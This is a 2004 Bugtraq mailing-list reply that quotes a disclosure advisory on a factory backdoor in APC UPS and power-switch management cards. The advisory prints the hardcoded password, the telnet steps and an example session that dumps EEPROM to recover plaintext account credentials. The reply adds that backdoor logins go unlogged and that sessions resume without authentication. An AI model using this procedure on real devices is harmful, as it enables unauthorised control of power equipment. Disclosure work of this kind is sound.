[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040218165843.31118.qmail@www.securityfocus.com>
Date: 18 Feb 2004 16:58:43 -0000
From: brandon pierce <brandonp@...ynclh.com>
To: bugtraq@...urityfocus.com
Subject: Re: APC 9606 SmartSlot Web/SNMP management card "backdoor"
In-Reply-To: <1076930672.19026.88.camel@...alhost.localdomain>
Just tested on a client's Symmetra RM 12000 and had some interesting results with the following setup:
Model Number: AP9617
Manufacture Date: 12/20/2002
Hardware Revision: A10
Symmetra APP Ver: 120
Symmetra APP Date: 12/09/2002
AOS Card Ver: 120
AOS Card Date: 12/10/2002
There are a few side notes that should be noted:
The backdoor login does NOT show up in the event log for the system.
If the telnet session using the backdoor login is terminated with ^] then the session can be resumed simply by using telnet to sign back in with NO authentication. This even works if attempting to resume the session from a different IP address.
>*** Background:
>APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
>supply) products have a Web and SNMP management card installed that permits
>local serial console, TELNET, web and SNMP management, monitoring and
>mains power control of attached devices.
>
>
>*** The Problem:
>APC SmartSlot Web/SNMP management cards have a "backdoor" password that can
>be abused to extract plain text username/password details for all accounts
>and hence gain unauthorised full control of the device.
>
>Tested vulnerable:
>SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
>MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0
>
>
>*** Description:
>The "backdoor" password is designed for use by the factory for initial
>configuration of the card, e.g. MAC Address, Serial Number etc. However, it
>is possible to dump the contents of EEPROM which amongst other things
>stores the account usernames and passwords.
>
>The "backdoor" password is accepted via either the local serial port or
>TELNET. Use of the password on the web interface does not appear to be
>possible.
>
>
>*** To recreate (typical example):
>Connect a console to the serial port or TELNET to the card. At the username
>prompt use any username. The password is all alphabetic characters and is
>case sensitive: TENmanUFactOryPOWER
>
>At the selection prompt, type 13 and press return. Type the byte address of
>the EEPROM location to view, e.g. 1d0 and press return. Look carefully for
>the username and password pairs. Different firmware revisions may have the
>account details at different EEPROM locations. The accounts in the example
>below are the default accounts after their passwords have been changed.
>Username: apc Password: BBCCDDEEF
>Username: device Password: AAAABBBBB
>
>Press return to get back to the Factory Menu and press ctrl-A to logout.
>You can now TELNET to the card again and use the account details you've
>just recovered to log into and control the device.
>
>You should use the other selections with extreme care. You may cause
>irrepairable damage and will most certainly invalidate any warranty.
>The EEPROM also contains other user-configurable options in either plain
>text or binary encoded form. They are not detailed in this advisory.
>
>Example:
>
>[root@...ays root]# telnet 192.168.1.1
>Trying 192.168.1.1...
>Connected to 192.168.1.1.
>Escape character is '^]'.
>
>User Name : phade
>Password : TENmanUFactOryPOWER
>
>Factory Menu
><CTRL-A> to exit
>
>1AP9606
>2WA0044004472
>3G9
>410/25/2000
>500 C0 B7 A2 C8 2D
>6v3.2.1
>7A
>8A
>9192.168.1.1
>A255.255.255.0
>B192.168.1.254
>C
>D
>E
>F
>G
>
>Selection> 13
>
>Enter byte address in Hex(XXXX): 1d0
>
>01D0 FF 50 46 61 70 63 00 FF .PFapc..
>01D8 FF FF FF FF FF FF 42 42 ......BB
>01E0 43 43 44 44 45 45 46 00 CCDDEEF.
>01E8 FF 64 65 76 69 63 65 00 .device.
>01F0 FF FF FF FF 41 41 41 41 ....AAAA
>01F8 42 42 42 42 42 00 FF 61 BBBBB..a
>0200 64 6D 69 6E 20 75 73 65 dmin use
>0208 72 20 70 68 72 61 73 65 r phrase
>0210 00 FF FF FF FF FF FF FF ........
>0218 FF FF FF FF FF FF FF FF ........
>0220 64 65 76 69 63 65 20 75 device u
>0228 73 65 72 20 70 68 72 61 ser phra
>0230 73 65 00 FF FF FF FF FF se......
>0238 FF FF FF FF FF FF FF FF ........
>0240 FF 00 00 FF FF FF FF 21 .......!
>0248 56 00 00 00 00 00 00 55 V......U
>
><sp>nxt,b-bck,p-pch,other-exit
>
>
>*** Workaround/fix:
>Ensure that access to the local serial port is physically restricted and
>disable the TELNET interface as described in the device documentation. A
>patched version of the firmware which requires the management password
>to be entered before accessing the factory settings may be available
>from APC.
>
>
>*** Vendor status:
>APC were first notified six months ago on 12th August 2003 and were
>initially helpful in patching the problem. However, after testing a couple
>of beta fixes I've heard nothing for over 3 months.
>
>Dave Tarbatt,
>http://null.sniffing.net/
>
>
>--=-KV1stT8YdRNcY3VGzrOj--
>
>
Powered by blists - more mailing lists